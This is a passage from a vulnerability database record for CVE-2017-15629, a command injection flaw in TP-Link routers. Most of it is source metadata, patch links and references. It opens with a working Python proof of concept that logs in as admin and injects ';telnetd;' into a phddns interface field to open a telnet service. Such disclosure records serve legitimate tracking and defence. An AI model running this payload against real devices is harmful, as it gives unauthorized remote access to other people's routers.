\u0027c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406\u0027\nBASEURL = \u0027http://192.168.123.1\u0027\nLOGINURL = BASEURL + \u0027/cgi-bin/luci/;stok=/login?form=login\u0027\n\n\nMARK = \u0027###\u0027\nVULURL = BASEURL + \u0027/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns\u0027 % (MARK)\n\nheaders = {\n \"Accept\": \"application/json, text/javascript, */*; q=0.01\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\n \"Host\": BASEURL[7:],\n \"Origin\": BASEURL,\n \"Referer\": \"%s/webpages/login.html\" % (BASEURL),\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"X-Requested-With\": \"XMLHttpRequest\"\n}\n\nlogin_data_value = {\u0027method\u0027: \u0027login\u0027,\u0027params\u0027: {\u0027password\u0027: PASSWORD,\u0027username\u0027: \u0027admin\u0027}}\nlogin_data = {\u0027data\u0027:json.dumps(login_data_value)}\ns = requests.Session()\ns.headers.update(headers)\nprint (LOGINURL)\nprint (login_data)\nres = s.post(LOGINURL, data=login_data)\nstok = eval(res.text)[\u0027result\u0027][\u0027stok\u0027]\nprint \u0027[*] stok is %s\u0027 % (stok)\n\ntmp_vul = VULURL.replace(MARK, stok)\nprint \u0027[*] vul_url is %s \u0027 % (tmp_vul)\n\ndelete_data = {\"method\":\"delete\",\"params\":{\"key\":\"key-0\",\"index\":\"0\"}}\ndelete_data = {\u0027data\u0027: json.dumps(delete_data)}\nprint \u0027[+] delete existed rule\u0027\nres = s.post(tmp_vul, data=delete_data)\nprint \u0027[*] response is: %s\u0027 % (res.text)\n\n# after executing this payload, the router will open its telnetd service. \npayload = \u0027\u0027\u0027;telnetd;\u0027\u0027\u0027\nvul_data = {\"method\":\"add\",\"params\":{\"index\":0,\"old\":\"add\",\"new\":{\"interface\":\"WAN1%s\" % (payload),\"name\":\"test1\",\"passwd\":\"test\",\"enable\":\"on\"},\"key\":\"add\"}}\n\nvul_data = {\u0027data\u0027: json.dumps(vul_data)}\nprint \u0027[+] sending payload\u0027\nres = s.post(tmp_vul, data=vul_data)\nprint \u0027[*] response is: %s\u0027 % (res.text)\n***********************************\n\n\nReference:\n================\nhttps://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-15629"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULHUB",
"id": "VHN-106470"
},
{
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"db": "PACKETSTORM",
"id": "145823"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-15629",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-02034",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "145823",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-106470",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-15629",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULHUB",
"id": "VHN-106470"
},
{
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "PACKETSTORM",
"id": "145823"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"id": "VAR-201801-0554",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULHUB",
"id": "VHN-106470"
}
],
"trust": 1.2804204167999997
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
}
]
},
"last_update_date": "2024-11-23T21:39:57.583000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.tp-link.com/us/"
},
{
"title": "Patch for TP-LinkWVR, WAR, and ER device arbitrary command execution vulnerability (CNVD-2018-02034)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/114579"
},
{
"title": "TP-Link WVR , WAR and ER Repair measures for device security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=90684"
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/lnick2023/nicenice "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/qazbnm456/awesome-cve-poc "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-106470"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/chunibalon/vulnerability/blob/master/cve-2017-15613_to_cve-2017-15637.txt"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/archive/1/541655/100/0/threaded"
},
{
"trust": 1.4,
"url": "http://www.securityfocus.com/archive/1/archive/1/541655/100/0/threaded"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15629"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-15629"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/145823/tp-link-remote-command-injection.html"
},
{
"trust": 0.1,
"url": "https://github.com/qazbnm456/awesome-cve-poc"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15631"
},
{
"trust": 0.1,
"url": "http://192.168.123.1\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15624"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15622"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15613"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15626"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15635"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15637"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15636"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15621"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15630"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15616"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15633"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15617"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15623"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15634"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-15625"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULHUB",
"id": "VHN-106470"
},
{
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "PACKETSTORM",
"id": "145823"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"db": "VULHUB",
"id": "VHN-106470"
},
{
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"db": "PACKETSTORM",
"id": "145823"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"date": "2018-01-11T00:00:00",
"db": "VULHUB",
"id": "VHN-106470"
},
{
"date": "2018-01-11T00:00:00",
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"date": "2018-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"date": "2018-01-11T02:59:14",
"db": "PACKETSTORM",
"id": "145823"
},
{
"date": "2017-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"date": "2018-01-11T16:29:01.097000",
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02034"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-106470"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2017-15629"
},
{
"date": "2018-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011946"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201710-902"
},
{
"date": "2024-11-21T03:14:54.237000",
"db": "NVD",
"id": "CVE-2017-15629"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "145823"
},
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural TP-Link Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011946"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201710-902"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.